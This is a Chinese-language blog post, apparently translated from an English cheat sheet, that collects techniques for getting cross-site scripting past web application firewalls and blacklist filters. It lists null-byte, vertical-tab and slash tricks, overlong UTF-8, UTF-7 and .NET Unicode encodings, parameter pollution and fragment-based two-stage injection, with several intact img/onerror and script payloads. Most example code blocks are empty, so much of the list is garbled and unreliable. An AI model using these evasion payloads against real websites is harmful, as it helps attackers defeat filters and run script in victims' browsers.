XSS绕waf合集 作者: Hack Inn 时间: August 5, 2016 分类: 技术分享 访问: 3,192 次 > 往事只能回味,我已近完全忘却了,原来我还发过这样一篇文章,一次数据库的丢失并未让我失去这些美好的回忆。原来,这边是曾今的一切。。。继续保持当年的那份初心吧,感谢Web ARCHIVE(https://web.archive.org/web/20160830125339/http://www.hackinn.com/index.php/archives/44/) ,于2020年初夏 在一个有效的xss集合中,我们发现渗透测试十分的有用,特别是在当有waf或者黑名单过滤时,但并不像你用AK-47在空中扫射一样容易。 简单字符操作。 请注意,我用十六进制表示的字符,但你不可能把它打出来。例如,\x00等于一个空字节,但在运用中使用哪种编码还要看实际情况(URL编码\x00=%00)。 HaRdc0r3 caS3 s3nsit1vITy bYpa55! ```` ```` 零字节字符之间的HTML属性名称、等号(IE,Safari)。 ```` 斜杠字符之间的HTML属性名称、等号(IE,Firefox,Chrome,Safari)。 `` `` 垂直制表符之间的HTML属性名称、等号(IE,Safari)。 `` `` 零字节字符之间的等号和JavaScript代码(IE)。 `` `` 零字节字符的HTML属性名称的字符之间(IE)。 `` `` 零字节字符在HTML元素名称的字符(IE)。 ``<\x00img src='1' onerror=alert(0) />`` 零字节字符后的HTML元素名称的字符(IE,Safari)。 ```` 零字节字符的HTML元素的名称字符之间(IE)。 `` `` 用斜杠代替空格(IE,Firefox,Chrome,Safari)。 `` `` 使用垂直制表符代替空格(IE,Safari)。 ```` 在某些情况下,使用引号来代替空格(Safari)。 ```` ```` 用空字节而不是在某些情况下,空格(IE)。 ```` 不要使用空格(IE,Firefox,Chrome,Safari)。 ```` 前缀的URI方案。 Firefox (\x09, \x0a, \x0d, \x20) Chrome (Any character \x01 to \x20) `` `` 不大于所需(IE,火狐,Chrome,Safari)。 ``alert(0)`` 反斜杠字符之间的表达和圆括号(IE)。 ```` JavaScript Escaping ```` Encoding Galore. HTML Attribute Encoding ```` ```` ```` ```` URL Encoding ```` ```` CSS Hexadecimal Encoding (IE specific examples) ``Joker`` ``Joker`` ``Joker`` ``Joker`` JavaScript (hexadecimal, octal, and unicode) ```` ```` ```` ```` JavaScript(十进制字符码) ```` ```` JavaScript(Unicode的函数和变量的名字) ```` ```` 超长UTF-8(SiteMinder真棒!) ``< = %C0%BC = %E0%80%BC = %F0%80%80%BC`` ``> = %C0%BE = %E0%80%BE = %F0%80%80%BE`` ``' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7`` ``" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2`` ```` ``%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE`` UTF-7(缺少字符集?) ```` ``+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-`` Unicode .NET Ugliness ```` ``%uff1cscript%uff1ealert(1)%uff1c/script%uff1e`` 经典的ASP执行一些Unicode homoglyphic翻译…不要问为什么… ```` ``%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A`` 无用和/或有用的功能。 HTML 5(不全面) ```` ```` 不存在的元素使用(IE) ```` CSS Comments (IE) 执行的JavaScript功能的替代方法 ```` ```` ```` ```` 分裂到JavaScript的HTML属性 ```` 在JavaScript的HTML解析 ``';`` 在CSS的HTML解析 ``');`` XSS的XML文档中的[ DOCTYPE = text/xml ](火狐,Chrome,Safari)。 `` `` URI方案 (Firefox, Chrome, Safari) ```` `` `` ```` ```` HTTP参数污染 http://target.com/something.xxx?a=val1&a;=val2 ASP.NET a = val1,val2 ASP a = val1,val2 JSP a = val1 PHP a = val2 两阶段XSS通过片段标识符(旁路长度限制/避免服务器日志) ```` `` ``(Firefox) ``http://target.com/something.jsp?inject=#alert(1)`` 两阶段XSS通过名称属性 ```` 非字母数字的疯狂之中… ```` ```` > From: http://d3adend.org/xss/ghettoBypass 标签: none